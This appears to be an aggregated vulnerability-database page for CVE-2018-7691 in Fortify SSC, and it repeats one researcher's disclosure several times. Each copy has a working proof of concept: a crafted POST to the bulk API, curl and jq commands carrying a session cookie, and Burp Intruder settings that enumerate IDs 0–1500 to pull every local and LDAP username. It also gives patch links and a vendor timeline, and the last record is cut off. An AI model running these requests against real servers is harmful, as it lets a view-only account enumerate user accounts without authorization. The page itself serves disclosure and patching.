Fortify SSC 17.10 / 17.20 / 18.10 User Detail Insecure Direct Object Reference

2018-12-13T00:00:00

Description

{"id": "PACKETSTORM:150771", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Fortify SSC 17.10 / 17.20 / 18.10 User Detail Insecure Direct Object Reference", "description": "", "published": "2018-12-13T00:00:00", "modified": "2018-12-13T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://packetstormsecurity.com/files/150771/Fortify-SSC-17.10-17.20-18.10-User-Detail-Insecure-Direct-Object-Reference.html", "reporter": "Alt3kx", "references": [], "cvelist": ["CVE-2018-7691"], "lastseen": "2018-12-13T10:52:13", "viewCount": 53, "enchantments": {"score": {"value": 4.6, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2018-7691"]}, {"type": "exploitdb", "idList": ["EDB-ID:45990"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:0C54CFC9B8CF2939D4AAD367FBCC65C8"]}, {"type": "zdt", "idList": ["1337DAY-ID-31784"]}], "rev": 4}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2018-7691"]}, {"type": "exploitdb", "idList": ["EDB-ID:45990"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:0C54CFC9B8CF2939D4AAD367FBCC65C8"]}, {"type": "zdt", "idList": ["1337DAY-ID-31784"]}]}, "exploitation": null, "vulnersScore": 4.6}, "sourceHref": "https://packetstormsecurity.com/files/download/150771/CVE-2018-7691.txt", "sourceData": "`Details \n================ \nSoftware: Fortify SSC (Software Security Center) \nVersion: 17.10, 17.20 & 18.10 \nHomepage: https://www.microfocus.com \nAdvisory report: https://github.com/alt3kx/CVE-2018-7691 \nCVE: CVE-2018-7691 \nCVSS: 6.5 (Medium; AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N) \nCWE-639 \n \nDescription \n================ \nREST API contains Insecure direct object references (IDOR) allowing and extracting arbitrary details of the Local and LDAP users via POST method \n \nVulnerability \n================ \nFortify SSC (Software Security Center) 17.10, does not properly check ownership of \"authEntities\", which allows remote authenticated (view-only) users \nto read arbitrary details via API bulk parameter to /api/v1/projectVersions/{NUMBER}/authEntities \n \nNote: View-only Role, is a restricted role, can view results, but cannot interfere with the issue triage or the remediation process. \n \n \nProof of concept \n================ \n \nPre-requisites: \n \n- Curl command deployed (Windows or Linux) \n- jq command deployed (for parsing JSON fields), (Windows or Linux) \n- Burpsuite Free/Por deployed or any other Proxy to catch/send the request (optional) \n \nStep (1): LogOn into fortifyserver.com SSC (Software Security Center) 17.10 with your view-only role (restricted), \n \nThe URL normally is avaiable as following: \n \nTarget: https://fortifyserver.com/ssc/#/ \n \nStep (2): Once logged extract the Cookie field, the format normally as following: \"Cookie: JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;\" \nStep (3): Start BurpSuite Free/Pro or any other HTTP proxy (optional) listen port 8080 as default \n \nStep (4): The offending POST is: \n \nPOST /ssc/api/v1/bulk HTTP/1.1 \nHost: fortifyserver.com \nConnection: close \nAccept: application/json, text/plain, */* \nX-Requested-With: XMLHttpRequest \nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36 \nContent-Type: application/json;charset=UTF-8 \nAccept-Encoding: gzip, deflate \nAccept-Language: en-US,en;q=0.9 \nCookie: JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414; \nContent-Length: 123 \n \n{\"requests\":[{\"uri\":\"https://fortifyserver.com/ssc/api/v1/projectVersions/3/authEntities\",\"httpVerb\":\"GET\"}]}\\x0d\\x0a \n \n \nStep (5): Test the first POST (to be included the cookie session) request and parsing the JSON data received using curl and jq commands as following: \n \n# curl -s -k -X POST https://fortifyserver.com/ssc/api/v1/bulk \n \n-H \"Host: fortifyserver.com\" \n-H \"Connection: close\" \n-H \"Accept: application/json, text/plain, */*\" \n-H \"X-Requested-With: XMLHttpRequest\" \n-H \"User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36\" \n-H \"Content-Type: application/json;charset=UTF-8\" \n-H \"Accept-Encoding: gzip, deflate\" \n-H \"Accept-Language: en-US,en;q=0.9\" \n-H \"Cookie: JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;\" \n-b \"JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;\" \n--data-binary \"{\\\"requests\\\":[{\\\"uri\\\":\\\"https://fortifyserver.com/ssc/api/v1/projectVersions/0/authEntities\\\",\\\"httpVerb\\\":\\\"GET\\\"}]}\\x0d\\x0a\" \n--proxy http://127.0.0.1:8080 | jq '.data[] .responses[] .body .responseCode' \n \nYou should see the following response: \n \n200 \n \nStep (6): Now extract all local and LDAP users registered into Fortify SSC server: \n \nPayload: /api/v1/projectVersions/{NUMBER}/authEntities, see the field \"--data-binary\" below and change the number as following: \n \n# curl -s -k -X POST https://fortifyserver.com/ssc/api/v1/bulk \n \n-H \"Host: fortifyserver.com\" \n-H \"Connection: close\" \n-H \"Accept: application/json, text/plain, */*\" \n-H \"X-Requested-With: XMLHttpRequest\" \n-H \"User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36\" \n-H \"Content-Type: application/json;charset=UTF-8\" \n-H \"Accept-Encoding: gzip, deflate\" \n-H \"Accept-Language: en-US,en;q=0.9\" \n-H \"Cookie: JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;\" \n-b \"JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;\" \n--data-binary \"{\\\"requests\\\":[{\\\"uri\\\":\\\"https://fortifyserver.com/ssc/api/v1/projectVersions/3/authEntities\\\",\\\"httpVerb\\\":\\\"GET\\\"}]}\\x0d\\x0a\" \n--proxy http://127.0.0.1:8080 | jq '.data[] .responses[] .body .data[] .entityName' \n \nYou should see the following response with users available \n \n\"admin\" \n\"sca\" \n\"alex\" \n \n[../snip] \n \nStep (7): Automate with BurpSuite Pro/Free choose: \n \nPayload Positions: \"Intruder Tab -> Positions\" highlight as following: \n \n \n-> /api/v1/projectVersions/SS1SS/authEntities \n \n \nPayloads set: \"Intruder Tab -> Payloads\" with the following data: \n \n \n-> Payload set: 1 \n \n-> Payload type: Numbers \n \n \nPayload Options [Numbers]: \n \n \n-> Type: Sequential \n \n-> From: 0 \n \n-> To: 1500 \n \n-> Step: 1 \n \n \nThen start attack \nHave fun! \n \nHave fun! \n \n \nMitigations \n================ \nInstall the latest patches availabe here: \nhttps://softwaresupport.softwaregrp.com/doc/KM03298201 \n \nDisclosure policy \n================ \nWe believes in responsible disclosure. \nPlease contact us on Alex Hernandez aka alt3kx (at) protonmail com to acknowledge this report. \n \nThis vulnerability will be published if we do not receive a response to this report with 10 days. \n \nTimeline \n================ \n \n2018-05-24: Discovered \n2018-05-25: Retest PRO environment \n2018-05-31: Vendor notification, two issues found \n2018-05-31: Vendor feedback received \n2018-06-01: Internal communication \n2018-06-01: Vendor feedback, two issues are confirmed \n2018-06-05: Vendor notification, new issue found \n2018-06-06: Vendor feedback, evaluating High submission \n2018-06-08: Vendor feedback, High issue is confirmed \n2018-06-19: Researcher, reminder sent \n2018-06-22: Vendor feedback, summary of CVEs handled as official way \n2018-06-26: Vendor feedback, official Hotfix for High issue available to test \n2018-06-29: Researcher feedback \n2018-07-02: Researcher feedback \n2018-07-04: Researcher feedback, Hotfix tested on QA environment \n2018-07-05: Vendor feedback, fixes scheduled Aug/Sep 2018 \n2018-08-02: Reminder to vendor, feedback received OK! \n2018-09-26: Reminder to vendor, feedback received OK! \n2018-09-26: Fixes received from the vendor \n2018-10-02: Internal QA environment failed, re-building researcher 's ecosystem \n2018-10-11: Internal QA environment failed, re-building researcher 's ecosystem \n2018-10-11: Feedback from the vendor, technical details provided to the researcher \n2018-10-16: Fixes now tested on QA environment \n2018-11-08: Reminder received from the vendor, feedback provided by researcher \n2018-11-09: Re-rest fixes on QA environment \n2018-11-15: Re-rest fixes on QA environment now with SSC 18.20 version deployed \n2018-11-21: Researcher feedback \n2018-11-23: Fixes working well/confirmed by researcher \n2018-11-23: Vendor feedback, final details to disclosure the CVE and official fixes available for customers. \n2018-11-26: Vendor feedback, CVE, and official fixes to be disclosure \n2018-11-26: Agreements with the vendor to publish the CVE/Advisory. \n2018-12-12: Public report \n \nDiscovered by: \nAlex Hernandez aka alt3kx: \n================ \nPlease visit https://github.com/alt3kx for more information. \n \nMy current exploit list @exploit-db: \nhttps://www.exploit-db.com/author/?a=1074 & https://www.exploit-db.com/author/?a=9576 \n`\n", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645450862}}

{"exploitpack": [{"lastseen": "2020-04-01T19:04:16", "description": "\nFortify Software Security Center (SSC) 17.1017.2018.10 - Information Disclosure (2)", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-12-14T00:00:00", "title": "Fortify Software Security Center (SSC) 17.1017.2018.10 - Information Disclosure (2)", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7691"], "modified": "2018-12-14T00:00:00", "id": "EXPLOITPACK:0C54CFC9B8CF2939D4AAD367FBCC65C8", "href": "", "sourceData": "Details\n================\nSoftware: Fortify SSC (Software Security Center)\nVersion: 17.10, 17.20 & 18.10\nHomepage: https://www.microfocus.com\nAdvisory report: https://github.com/alt3kx/CVE-2018-7691\nCVE: CVE-2018-7691\nCVSS: 6.5 (Medium; AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)\nCWE-639\n\nDescription\n================\nREST API contains Insecure direct object references (IDOR) allowing and extracting arbitrary details of the Local and LDAP users via POST method\n\nVulnerability\n================\nFortify SSC (Software Security Center) 17.10, does not properly check ownership of \"authEntities\", which allows remote authenticated (view-only) users\nto read arbitrary details via API bulk parameter to /api/v1/projectVersions/{NUMBER}/authEntities\n\nNote: View-only Role, is a restricted role, can view results, but cannot interfere with the issue triage or the remediation process.\n\nProof of concept\n================\n\nPre-requisites:\n\n- Curl command deployed (Windows or Linux)\n- jq command deployed (for parsing JSON fields), (Windows or Linux)\n- Burpsuite Free/Por deployed or any other Proxy to catch/send the request (optional)\n\nStep (1): LogOn into fortifyserver.com SSC (Software Security Center) 17.10 with your view-only role (restricted),\n\nThe URL normally is avaiable as following:\n\nTarget: https://fortifyserver.com/ssc/#/\n\nStep (2): Once logged extract the Cookie field, the format normally as following: \"Cookie: JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;\"\nStep (3): Start BurpSuite Free/Pro or any other HTTP proxy (optional) listen port 8080 as default\n\nStep (4): The offending POST is:\n\nPOST /ssc/api/v1/bulk HTTP/1.1\nHost: fortifyserver.com\nConnection: close\nAccept: application/json, text/plain, */*\nX-Requested-With: XMLHttpRequest\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36\nContent-Type: application/json;charset=UTF-8\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\nCookie: JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;\nContent-Length: 123\n\n{\"requests\":[{\"uri\":\"https://fortifyserver.com/ssc/api/v1/projectVersions/3/authEntities\",\"httpVerb\":\"GET\"}]}\\x0d\\x0a\n\nStep (5): Test the first POST (to be included the cookie session) request and parsing the JSON data received using curl and jq commands as following:\n\n# curl -s -k -X POST https://fortifyserver.com/ssc/api/v1/bulk\n\n-H \"Host: fortifyserver.com\"\n-H \"Connection: close\"\n-H \"Accept: application/json, text/plain, */*\"\n-H \"X-Requested-With: XMLHttpRequest\"\n-H \"User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36\"\n-H \"Content-Type: application/json;charset=UTF-8\"\n-H \"Accept-Encoding: gzip, deflate\"\n-H \"Accept-Language: en-US,en;q=0.9\"\n-H \"Cookie: JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;\"\n-b \"JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;\"\n--data-binary \"{\\\"requests\\\":[{\\\"uri\\\":\\\"https://fortifyserver.com/ssc/api/v1/projectVersions/0/authEntities\\\",\\\"httpVerb\\\":\\\"GET\\\"}]}\\x0d\\x0a\"\n--proxy http://127.0.0.1:8080 | jq '.data[] .responses[] .body .responseCode'\n\nYou should see the following response:\n\n200\n\nStep (6): Now extract all local and LDAP users registered into Fortify SSC server:\n\nPayload: /api/v1/projectVersions/{NUMBER}/authEntities, see the field \"--data-binary\" below and change the number as following:\n\n# curl -s -k -X POST https://fortifyserver.com/ssc/api/v1/bulk\n\n-H \"Host: fortifyserver.com\"\n-H \"Connection: close\"\n-H \"Accept: application/json, text/plain, */*\"\n-H \"X-Requested-With: XMLHttpRequest\"\n-H \"User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36\"\n-H \"Content-Type: application/json;charset=UTF-8\"\n-H \"Accept-Encoding: gzip, deflate\"\n-H \"Accept-Language: en-US,en;q=0.9\"\n-H \"Cookie: JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;\"\n-b \"JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;\"\n--data-binary \"{\\\"requests\\\":[{\\\"uri\\\":\\\"https://fortifyserver.com/ssc/api/v1/projectVersions/3/authEntities\\\",\\\"httpVerb\\\":\\\"GET\\\"}]}\\x0d\\x0a\"\n--proxy http://127.0.0.1:8080 | jq '.data[] .responses[] .body .data[] .entityName'\n\nYou should see the following response with users available\n\n\"admin\"\n\"sca\"\n\"alex\"\n\n[../snip]\n\nStep (7): Automate with BurpSuite Pro/Free choose:\n\nPayload Positions: \"Intruder Tab -> Positions\" highlight as following:\n\n-> /api/v1/projectVersions/\u00a71\u00a7/authEntities\n\nPayloads set: \"Intruder Tab -> Payloads\" with the following data:\n\n-> Payload set: 1\n\n-> Payload type: Numbers\n\nPayload Options [Numbers]:\n\n-> Type: Sequential\n\n-> From: 0\n\n-> To: 1500\n\n-> Step: 1\n\nThen start attack\u2026\nHave fun!\n\nHave fun!\n\nMitigations\n================\nInstall the latest patches availabe here:\nhttps://softwaresupport.softwaregrp.com/doc/KM03298201\n\nDisclosure policy\n================\nWe believes in responsible disclosure.\nPlease contact us on Alex Hernandez aka alt3kx (at) protonmail com to acknowledge this report.\n\nThis vulnerability will be published if we do not receive a response to this report with 10 days.\n\nTimeline\n================\n\n2018-05-24: Discovered\n2018-05-25: Retest PRO environment\n2018-05-31: Vendor notification, two issues found\n2018-05-31: Vendor feedback received\n2018-06-01: Internal communication\n2018-06-01: Vendor feedback, two issues are confirmed\n2018-06-05: Vendor notification, new issue found\n2018-06-06: Vendor feedback, evaluating High submission\n2018-06-08: Vendor feedback, High issue is confirmed\n2018-06-19: Researcher, reminder sent\n2018-06-22: Vendor feedback, summary of CVEs handled as official way\n2018-06-26: Vendor feedback, official Hotfix for High issue available to test\n2018-06-29: Researcher feedback\n2018-07-02: Researcher feedback\n2018-07-04: Researcher feedback, Hotfix tested on QA environment\n2018-07-05: Vendor feedback, fixes scheduled Aug/Sep 2018\n2018-08-02: Reminder to vendor, feedback received OK!\n2018-09-26: Reminder to vendor, feedback received OK!\n2018-09-26: Fixes received from the vendor\n2018-10-02: Internal QA environment failed, re-building researcher 's ecosystem\n2018-10-11: Internal QA environment failed, re-building researcher 's ecosystem\n2018-10-11: Feedback from the vendor, technical details provided to the researcher\n2018-10-16: Fixes now tested on QA environment\n2018-11-08: Reminder received from the vendor, feedback provided by researcher\n2018-11-09: Re-rest fixes on QA environment\n2018-11-15: Re-rest fixes on QA environment now with SSC 18.20 version deployed\n2018-11-21: Researcher feedback\n2018-11-23: Fixes working well/confirmed by researcher\n2018-11-23: Vendor feedback, final details to disclosure the CVE and official fixes available for customers.\n2018-11-26: Vendor feedback, CVE, and official fixes to be disclosure\n2018-11-26: Agreements with the vendor to publish the CVE/Advisory.\n2018-12-12: Public report\n\nDiscovered by:\nAlex Hernandez aka alt3kx:\n================\nPlease visit https://github.com/alt3kx for more information.\n\nMy current exploit list @exploit-db:\nhttps://www.exploit-db.com/author/?a=1074 & https://www.exploit-db.com/author/?a=9576", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}], "zdt": [{"lastseen": "2018-12-18T06:31:09", "description": "Exploit for multiple platform in category web applications", "cvss3": {}, "published": "2018-12-14T00:00:00", "type": "zdt", "title": "Fortify Software Security Center (SSC) 17.10/17.20/18.10 - Information Disclosure (2)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-7691"], "modified": "2018-12-14T00:00:00", "id": "1337DAY-ID-31784", "href": "https://0day.today/exploit/description/31784", "sourceData": "Details\r\n================\r\nSoftware: Fortify SSC (Software Security Center)\r\nVersion: 17.10, 17.20 & 18.10\r\nHomepage: https://www.microfocus.com\r\nAdvisory report: https://github.com/alt3kx/CVE-2018-7691\r\nCVE: CVE-2018-7691\r\nCVSS: 6.5 (Medium; AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)\r\nCWE-639\r\n\r\nDescription\r\n================\r\nREST API contains Insecure direct object references (IDOR) allowing and extracting arbitrary details of the Local and LDAP users via POST method\r\n\r\nVulnerability\r\n================\r\nFortify SSC (Software Security Center) 17.10, does not properly check ownership of \"authEntities\", which allows remote authenticated (view-only) users\r\nto read arbitrary details via API bulk parameter to /api/v1/projectVersions/{NUMBER}/authEntities\r\n\r\nNote: View-only Role, is a restricted role, can view results, but cannot interfere with the issue triage or the remediation process.\r\n\r\nProof of concept\r\n================\r\n\r\nPre-requisites:\r\n\r\n- Curl command deployed (Windows or Linux)\r\n- jq command deployed (for parsing JSON fields), (Windows or Linux)\r\n- Burpsuite Free/Por deployed or any other Proxy to catch/send the request (optional)\r\n\r\nStep (1): LogOn into fortifyserver.com SSC (Software Security Center) 17.10 with your view-only role (restricted),\r\n\r\nThe URL normally is avaiable as following:\r\n\r\nTarget: https://fortifyserver.com/ssc/#/\r\n\r\nStep (2): Once logged extract the Cookie field, the format normally as following: \"Cookie: JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;\"\r\nStep (3): Start BurpSuite Free/Pro or any other HTTP proxy (optional) listen port 8080 as default\r\n\r\nStep (4): The offending POST is:\r\n\r\nPOST /ssc/api/v1/bulk HTTP/1.1\r\nHost: fortifyserver.com\r\nConnection: close\r\nAccept: application/json, text/plain, */*\r\nX-Requested-With: XMLHttpRequest\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36\r\nContent-Type: application/json;charset=UTF-8\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9\r\nCookie: JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;\r\nContent-Length: 123\r\n\r\n{\"requests\":[{\"uri\":\"https://fortifyserver.com/ssc/api/v1/projectVersions/3/authEntities\",\"httpVerb\":\"GET\"}]}\\x0d\\x0a\r\n\r\nStep (5): Test the first POST (to be included the cookie session) request and parsing the JSON data received using curl and jq commands as following:\r\n\r\n# curl -s -k -X POST https://fortifyserver.com/ssc/api/v1/bulk\r\n\r\n-H \"Host: fortifyserver.com\"\r\n-H \"Connection: close\"\r\n-H \"Accept: application/json, text/plain, */*\"\r\n-H \"X-Requested-With: XMLHttpRequest\"\r\n-H \"User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36\"\r\n-H \"Content-Type: application/json;charset=UTF-8\"\r\n-H \"Accept-Encoding: gzip, deflate\"\r\n-H \"Accept-Language: en-US,en;q=0.9\"\r\n-H \"Cookie: JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;\"\r\n-b \"JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;\"\r\n--data-binary \"{\\\"requests\\\":[{\\\"uri\\\":\\\"https://fortifyserver.com/ssc/api/v1/projectVersions/0/authEntities\\\",\\\"httpVerb\\\":\\\"GET\\\"}]}\\x0d\\x0a\"\r\n--proxy http://127.0.0.1:8080 | jq '.data[] .responses[] .body .responseCode'\r\n\r\nYou should see the following response:\r\n\r\n200\r\n\r\nStep (6): Now extract all local and LDAP users registered into Fortify SSC server:\r\n\r\nPayload: /api/v1/projectVersions/{NUMBER}/authEntities, see the field \"--data-binary\" below and change the number as following:\r\n\r\n# curl -s -k -X POST https://fortifyserver.com/ssc/api/v1/bulk\r\n\r\n-H \"Host: fortifyserver.com\"\r\n-H \"Connection: close\"\r\n-H \"Accept: application/json, text/plain, */*\"\r\n-H \"X-Requested-With: XMLHttpRequest\"\r\n-H \"User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36\"\r\n-H \"Content-Type: application/json;charset=UTF-8\"\r\n-H \"Accept-Encoding: gzip, deflate\"\r\n-H \"Accept-Language: en-US,en;q=0.9\"\r\n-H \"Cookie: JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;\"\r\n-b \"JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;\"\r\n--data-binary \"{\\\"requests\\\":[{\\\"uri\\\":\\\"https://fortifyserver.com/ssc/api/v1/projectVersions/3/authEntities\\\",\\\"httpVerb\\\":\\\"GET\\\"}]}\\x0d\\x0a\"\r\n--proxy http://127.0.0.1:8080 | jq '.data[] .responses[] .body .data[] .entityName'\r\n\r\nYou should see the following response with users available\r\n\r\n\"admin\"\r\n\"sca\"\r\n\"alex\"\r\n\r\n[../snip]\r\n\r\nStep (7): Automate with BurpSuite Pro/Free choose:\r\n\r\nPayload Positions: \"Intruder Tab -> Positions\" highlight as following:\r\n\r\n-> /api/v1/projectVersions/\u00a71\u00a7/authEntities\r\n\r\nPayloads set: \"Intruder Tab -> Payloads\" with the following data:\r\n\r\n-> Payload set: 1\r\n\r\n-> Payload type: Numbers\r\n\r\nPayload Options [Numbers]:\r\n\r\n-> Type: Sequential\r\n\r\n-> From: 0\r\n\r\n-> To: 1500\r\n\r\n-> Step: 1\r\n\r\nThen start attack\u2026\r\nHave fun!\r\n\r\nHave fun!\r\n\r\nMitigations\r\n================\r\nInstall the latest patches availabe here:\r\nhttps://softwaresupport.softwaregrp.com/doc/KM03298201\r\n\r\nDisclosure policy\r\n================\r\nWe believes in responsible disclosure.\r\nPlease contact us on Alex Hernandez aka alt3kx (at) protonmail com to acknowledge this report.\r\n\r\nThis vulnerability will be published if we do not receive a response to this report with 10 days.\r\n\r\nTimeline\r\n================\r\n\r\n2018-05-24: Discovered\r\n2018-05-25: Retest PRO environment\r\n2018-05-31: Vendor notification, two issues found\r\n2018-05-31: Vendor feedback received\r\n2018-06-01: Internal communication\r\n2018-06-01: Vendor feedback, two issues are confirmed\r\n2018-06-05: Vendor notification, new issue found\r\n2018-06-06: Vendor feedback, evaluating High submission\r\n2018-06-08: Vendor feedback, High issue is confirmed\r\n2018-06-19: Researcher, reminder sent\r\n2018-06-22: Vendor feedback, summary of CVEs handled as official way\r\n2018-06-26: Vendor feedback, official Hotfix for High issue available to test\r\n2018-06-29: Researcher feedback\r\n2018-07-02: Researcher feedback\r\n2018-07-04: Researcher feedback, Hotfix tested on QA environment\r\n2018-07-05: Vendor feedback, fixes scheduled Aug/Sep 2018\r\n2018-08-02: Reminder to vendor, feedback received OK!\r\n2018-09-26: Reminder to vendor, feedback received OK!\r\n2018-09-26: Fixes received from the vendor\r\n2018-10-02: Internal QA environment failed, re-building researcher 's ecosystem\r\n2018-10-11: Internal QA environment failed, re-building researcher 's ecosystem\r\n2018-10-11: Feedback from the vendor, technical details provided to the researcher\r\n2018-10-16: Fixes now tested on QA environment\r\n2018-11-08: Reminder received from the vendor, feedback provided by researcher\r\n2018-11-09: Re-rest fixes on QA environment\r\n2018-11-15: Re-rest fixes on QA environment now with SSC 18.20 version deployed\r\n2018-11-21: Researcher feedback\r\n2018-11-23: Fixes working well/confirmed by researcher\r\n2018-11-23: Vendor feedback, final details to disclosure the CVE and official fixes available for customers.\r\n2018-11-26: Vendor feedback, CVE, and official fixes to be disclosure\r\n2018-11-26: Agreements with the vendor to publish the CVE/Advisory.\r\n2018-12-12: Public report\r\n\r\nDiscovered by:\r\nAlex Hernandez aka alt3kx:\r\n================\r\nPlease visit https://github.com/alt3kx for more information.\r\n\r\nMy current exploit list @exploit-db:\r\nhttps://www.exploit-db.com/author/?a=1074 & https://www.exploit-db.com/author/?a=9576\n\n# 0day.today [2018-12-18] #", "sourceHref": "https://0day.today/exploit/31784", "cvss": {"score": 0.0, "vector": "NONE"}}], "cve": [{"lastseen": "2022-03-23T18:39:09", "description": "A potential Remote Unauthorized Access in Micro Focus Fortify Software Security Center (SSC), versions 17.10, 17.20, 18.10 this exploitation could allow Remote Unauthorized Access", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-12-13T14:29:00", "type": "cve", "title": "CVE-2018-7691", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7691"], "modified": "2019-10-09T23:42:00", "cpe": ["cpe:/a:microfocus:fortify_software_security_center:17.10", "cpe:/a:microfocus:fortify_software_security_center:18.10", "cpe:/a:microfocus:fortify_software_security_center:17.20"], "id": "CVE-2018-7691", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-7691", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:microfocus:fortify_software_security_center:17.20:*:*:*:*:*:*:*", "cpe:2.3:a:microfocus:fortify_software_security_center:18.10:*:*:*:*:*:*:*", "cpe:2.3:a:microfocus:fortify_software_security_center:17.10:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2022-01-13T05:34:14", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-12-14T00:00:00", "type": "exploitdb", "title": "Fortify Software Security Center (SSC) 17.10/17.20/18.10 - Information Disclosure (2)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7691", "2018-7691"], "modified": "2018-12-14T00:00:00", "id": "EDB-ID:45990", "href": "https://www.exploit-db.com/exploits/45990", "sourceData": "Details\r\n================\r\nSoftware: Fortify SSC (Software Security Center)\r\nVersion: 17.10, 17.20 & 18.10\r\nHomepage: https://www.microfocus.com\r\nAdvisory report: https://github.com/alt3kx/CVE-2018-7691\r\nCVE: CVE-2018-7691\r\nCVSS: 6.5 (Medium; 